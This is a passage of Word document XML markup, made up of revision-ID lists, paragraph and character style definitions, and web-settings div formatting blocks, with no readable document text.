    <w:rsid w:val="007C004D"/>
    <w:rsid w:val="007C12D5"/>
    <w:rsid w:val="007F7CF8"/>
    <w:rsid w:val="00807452"/>
    <w:rsid w:val="00813C49"/>
    <w:rsid w:val="008301E8"/>
    <w:rsid w:val="0083712D"/>
    <w:rsid w:val="008508EC"/>
    <w:rsid w:val="0085101E"/>
    <w:rsid w:val="00860ADC"/>
    <w:rsid w:val="00870DC7"/>
    <w:rsid w:val="00873514"/>
    <w:rsid w:val="00876052"/>
    <w:rsid w:val="008A626D"/>
    <w:rsid w:val="008B1983"/>
    <w:rsid w:val="008B3FE4"/>
    <w:rsid w:val="008B5AB2"/>
    <w:rsid w:val="008B60B6"/>
    <w:rsid w:val="008C1A3C"/>
    <w:rsid w:val="008C5C90"/>
    <w:rsid w:val="008D2074"/>
    <w:rsid w:val="0090416E"/>
    <w:rsid w:val="009064DA"/>
    <w:rsid w:val="0092165A"/>
    <w:rsid w:val="00922BEB"/>
    <w:rsid w:val="00940481"/>
    <w:rsid w:val="009436F9"/>
    <w:rsid w:val="0097230E"/>
    <w:rsid w:val="00972504"/>
    <w:rsid w:val="00974533"/>
    <w:rsid w:val="00983613"/>
    <w:rsid w:val="00991A35"/>
    <w:rsid w:val="00991C83"/>
    <w:rsid w:val="00993BFF"/>
    <w:rsid w:val="00996A3F"/>
    <w:rsid w:val="009A4743"/>
    <w:rsid w:val="009A5377"/>
    <w:rsid w:val="009B13CE"/>
    <w:rsid w:val="00A12822"/>
    <w:rsid w:val="00A13DDC"/>
    <w:rsid w:val="00A1702F"/>
    <w:rsid w:val="00A3566D"/>
    <w:rsid w:val="00A472E8"/>
    <w:rsid w:val="00A4754D"/>
    <w:rsid w:val="00A57189"/>
    <w:rsid w:val="00A942BD"/>
    <w:rsid w:val="00A95603"/>
    <w:rsid w:val="00AA0D6C"/>
    <w:rsid w:val="00AA2597"/>
    <w:rsid w:val="00AB33CB"/>
    <w:rsid w:val="00AC29C8"/>
    <w:rsid w:val="00AD2924"/>
    <w:rsid w:val="00AD3F2D"/>
    <w:rsid w:val="00AE0216"/>
    <w:rsid w:val="00AF5FD8"/>
    <w:rsid w:val="00B165CA"/>
    <w:rsid w:val="00B35676"/>
    <w:rsid w:val="00B40799"/>
    <w:rsid w:val="00B43BC1"/>
    <w:rsid w:val="00B46232"/>
    <w:rsid w:val="00B5434A"/>
    <w:rsid w:val="00B57F96"/>
    <w:rsid w:val="00B728B6"/>
    <w:rsid w:val="00B72EE0"/>
    <w:rsid w:val="00B859F3"/>
    <w:rsid w:val="00B86F74"/>
    <w:rsid w:val="00BA2B7E"/>
    <w:rsid w:val="00BB778A"/>
    <w:rsid w:val="00BC6A21"/>
    <w:rsid w:val="00BC7157"/>
    <w:rsid w:val="00BC757E"/>
    <w:rsid w:val="00C108F4"/>
    <w:rsid w:val="00C25406"/>
    <w:rsid w:val="00C3232F"/>
    <w:rsid w:val="00C50878"/>
    <w:rsid w:val="00C5460C"/>
    <w:rsid w:val="00C56441"/>
    <w:rsid w:val="00C57BFC"/>
    <w:rsid w:val="00C65696"/>
    <w:rsid w:val="00C72F03"/>
    <w:rsid w:val="00CA2807"/>
    <w:rsid w:val="00CD1235"/>
    <w:rsid w:val="00CD440D"/>
    <w:rsid w:val="00CD6275"/>
    <w:rsid w:val="00CE33D1"/>
    <w:rsid w:val="00D00D95"/>
    <w:rsid w:val="00D05845"/>
    <w:rsid w:val="00D267B8"/>
    <w:rsid w:val="00D26BFD"/>
    <w:rsid w:val="00D715B9"/>
    <w:rsid w:val="00D72637"/>
    <w:rsid w:val="00D948CD"/>
    <w:rsid w:val="00DA30A1"/>
    <w:rsid w:val="00DF2AC1"/>
    <w:rsid w:val="00E05FFE"/>
    <w:rsid w:val="00E10ABE"/>
    <w:rsid w:val="00E12727"/>
    <w:rsid w:val="00E27C20"/>
    <w:rsid w:val="00E445A3"/>
    <w:rsid w:val="00E542BC"/>
    <w:rsid w:val="00E56550"/>
    <w:rsid w:val="00E57A91"/>
    <w:rsid w:val="00E61E6E"/>
    <w:rsid w:val="00E779A4"/>
    <w:rsid w:val="00E87782"/>
    <w:rsid w:val="00EA703D"/>
    <w:rsid w:val="00EA7185"/>
    <w:rsid w:val="00EB57FF"/>
    <w:rsid w:val="00EB786A"/>
    <w:rsid w:val="00EE2B00"/>
    <w:rsid w:val="00EF008F"/>
    <w:rsid w:val="00F0360F"/>
    <w:rsid w:val="00F06AC7"/>
    <w:rsid w:val="00F15D09"/>
    <w:rsid w:val="00F23078"/>
    <w:rsid w:val="00F26676"/>
    <w:rsid w:val="00F5638C"/>
    <w:rsid w:val="00F676CC"/>
    <w:rsid w:val="00F72145"/>
    <w:rsid w:val="00F94925"/>
    <w:rsid w:val="00F972D0"/>
    <w:rsid w:val="00FA5780"/>
    <w:rsid w:val="00FB032C"/>
    <w:rsid w:val="00FB5CD7"/>
    <w:rsid w:val="00FD2FBB"/>
    <w:rsid w:val="00FD34C6"/>
    <w:rsid w:val="00FD72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507180E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{908F39D0-E3B9-410F-B30B-23C8D82CD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44AA1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00387B6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C57BFC"/>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C57BFC"/>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44AA1"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00644AA1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00237BB6"/>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42C62"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00922BEB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pf0">
    <w:name w:val="pf0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BC715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cf01">
    <w:name w:val="cf01"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BC7157"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000743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07433F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000743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07433F"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007A33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C57BFC"/>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semiHidden/>
    <w:rsid w:val="00C57BFC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C57BF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C57BFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C57BFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00387B68"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0083712D"/>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030107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="8458161">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="27686111">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="49232564">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="51511956">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="122895071">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="517621995">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="126244988">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="160776626">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="230653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399609">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1380982770">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="522092038">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="154996911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="299456765">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="316886389">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="318122155">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="346097289">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="385298231">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1124884827">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="599070253">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="DEDCD1"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="394203697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="465515738">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="470824495">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="479227995">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="491943637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="525560514">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="532502589">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="534198201">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="557670523">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="565802149">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="604388407">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="608507079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633024203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="648940008">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="658198358">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="680812124">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="710812707">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="726336950">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
